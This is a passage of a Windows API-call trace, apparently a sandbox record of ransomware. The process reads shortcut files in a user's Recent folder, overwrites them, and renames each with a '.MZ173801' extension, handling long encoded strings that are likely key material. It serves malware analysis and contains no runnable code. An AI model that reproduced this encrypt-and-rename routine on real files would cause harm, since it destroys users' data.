MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2ffpB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2ffpb.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2ffpB.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2ffpb.lnk.mz173801")) returned 1 [0106.562] GetCurrentThreadId () returned 0x1358 [0106.562] GetCurrentThreadId () returned 0x1358 [0106.562] GetCurrentThreadId () returned 0x1358 [0106.562] GetCurrentThreadId () returned 0x1358 [0106.562] GetCurrentThreadId () returned 0x1358 [0106.562] GetCurrentThreadId () returned 0x1358 [0106.562] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dafc545, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x8dafc545, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8dafc545, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x398, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="2n q.lnk", cAlternateFileName="2NQ~1.LNK")) returned 1 [0106.562] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.562] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.563] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2n q.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2n q.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dafc545, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x8dafc545, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8dafc545, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x398)) returned 1 [0106.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.563] GetCurrentThreadId () returned 0x1358 [0106.564] GetCurrentThreadId () returned 0x1358 [0106.564] GetCurrentThreadId () returned 0x1358 [0106.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.564] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.565] GetCurrentThreadId () returned 0x1358 [0106.565] GetCurrentThreadId () returned 0x1358 [0106.565] GetCurrentThreadId () returned 0x1358 [0106.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2n q.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2n q.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.565] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.565] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.565] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x398 [0106.565] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.565] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x398, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x398, lpOverlapped=0x0) returned 1 [0106.566] CloseHandle (hObject=0x3f4) returned 1 [0106.566] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2n q.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2n q.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.615] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x398, lpOverlapped=0x0) returned 1 [0106.616] CloseHandle (hObject=0x3f4) returned 1 [0106.617] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2n q.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2n q.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2n q.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\2n q.lnk.mz173801")) returned 1 [0106.617] GetCurrentThreadId () returned 0x1358 [0106.617] GetCurrentThreadId () returned 0x1358 [0106.617] GetCurrentThreadId () returned 0x1358 [0106.617] GetCurrentThreadId () returned 0x1358 [0106.617] GetCurrentThreadId () returned 0x1358 [0106.617] GetCurrentThreadId () returned 0x1358 [0106.618] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x764a5940, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x764a5940, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x764a6ce2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x32f, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="3067xe8riKxNNoH.lnk", cAlternateFileName="3067XE~1.LNK")) returned 1 [0106.618] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.618] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.618] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\3067xe8riKxNNoH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\3067xe8rikxnnoh.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x764a5940, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x764a5940, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x764a6ce2, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x32f)) returned 1 [0106.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.618] GetCurrentThreadId () returned 0x1358 [0106.618] GetCurrentThreadId () returned 0x1358 [0106.618] GetCurrentThreadId () returned 0x1358 [0106.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.619] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", 